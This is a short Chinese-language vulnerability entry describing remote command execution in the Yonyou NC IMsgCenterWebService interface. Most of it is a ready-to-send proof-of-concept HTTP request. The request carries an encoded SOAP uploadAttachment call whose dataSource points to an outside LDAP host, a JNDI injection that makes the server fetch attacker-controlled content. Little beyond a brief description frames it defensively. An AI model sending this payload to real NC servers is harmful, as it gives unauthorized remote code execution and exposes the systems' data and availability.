漏洞描述
用友NC IMsgCenterWebService接口存在远程命令执行漏洞。IMsgCenterWebService接口存在远程执行系统命令,远程命令执行漏洞,攻击者可以在远程随意执行windows或linux命令,从而达到窃取系统敏感信息,甚至可能影响系统的可用性。
用友NC IMsgCenterWebService 接口存在远程命令执行漏洞
PoC代码
POST /uapws/soapRequest.ajax HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 625
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
ws=nc.itf.msgcenter.IMsgCenterWebService&soap=%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3cenv%3aEnvelope%20xmlns%3aenv%3d%22http%3a%2f%2fschemas.xmlsoap.org%2fsoap%2fenvelope%2f%22%20xmlns%3asn%3d%22http%3a%2f%2fmsgcenter.itf.nc%2fIMsgCenterWebService%22%3e%3cenv%3aHeader%2f%3e%3cenv%3aBody%3e%3csn%3auploadAttachment%3e%3cdataSource%3eldap%3a%2f%2fvanecomyhj.iyhc.eu.org%2fTest%3c%2fdataSource%3e%3cmsgtype%3e%3f%3c%2fmsgtype%3e%3cpk_sourcemsg%3e%3f%3c%2fpk_sourcemsg%3e%3cfilename%3e%3f%3c%2ffilename%3e%3cfile%3e%3f%3c%2ffile%3e%3c%2fsn%3auploadAttachment%3e%3c%2fenv%3aBody%3e%3c%2fenv%3aEnvelope%3e